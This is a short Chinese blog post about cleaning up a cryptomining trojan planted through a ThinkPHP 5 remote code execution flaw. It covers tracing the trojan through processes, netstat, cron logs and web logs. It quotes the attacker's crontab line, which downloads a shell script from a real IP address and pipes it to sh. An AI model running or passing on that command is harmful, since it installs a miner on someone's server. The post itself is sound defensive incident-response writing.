下面由thinkphp教程欄目給大家介紹處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬的方法,希望對需要的朋友有所幫助!
記一次掛馬清除經歷:處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬
昨天發現 一臺服務器突然慢了 top 顯示 幾個進程100%以上的cpu使用
執行命令為 :
立即學習“PHP免費學習筆記(深入)”;
/tmp/php??-s?/tmp/p2.conf
基本可以確定是被掛馬了
下一步確定來源
last 沒有登陸記錄
先干掉這幾個進程,但是幾分鐘之后又出現了
先看看這個木馬想干什么吧
netstat 看到 這個木馬開啟了一個端口和國外的某個ip建立了連接
但是tcpdump了一小會兒 沒有發現任何數據傳遞
這他是想干啥?
繼續查看日志吧
在cron日志中發現了www用戶 有一個crontab定時操作 基本就是這個問題了
wget?-q?-O?-?http://83.220.169.247/cr3.sh?|?sh?>?/dev/null?2>&1
順著下載了幾個問題,看了看 應該是個挖礦的木馬程序
服務器上的www用戶 是安裝 lnmp 創建的,看了來源很可能就是web漏洞了。
再看/tmp下的php的權限 就是www的
查看 lnmp下幾個站的日志 ?發現是利用 thinkphp 5最近爆出的遠程代碼執行漏洞
漏洞細節:https://nosec.org/home/detail/2050.html
修復一下問題解決
但是 這個站點是測試站點 ?端口監聽的是 8083 ?,難道現在黑客能開始嗅探非常規端口了?
來源:https://www.simapple.com/425.html
相關推薦:最新的10個thinkphp視頻教程
? 版權聲明
文章版權歸作者所有,未經允許請勿轉載。
THE END
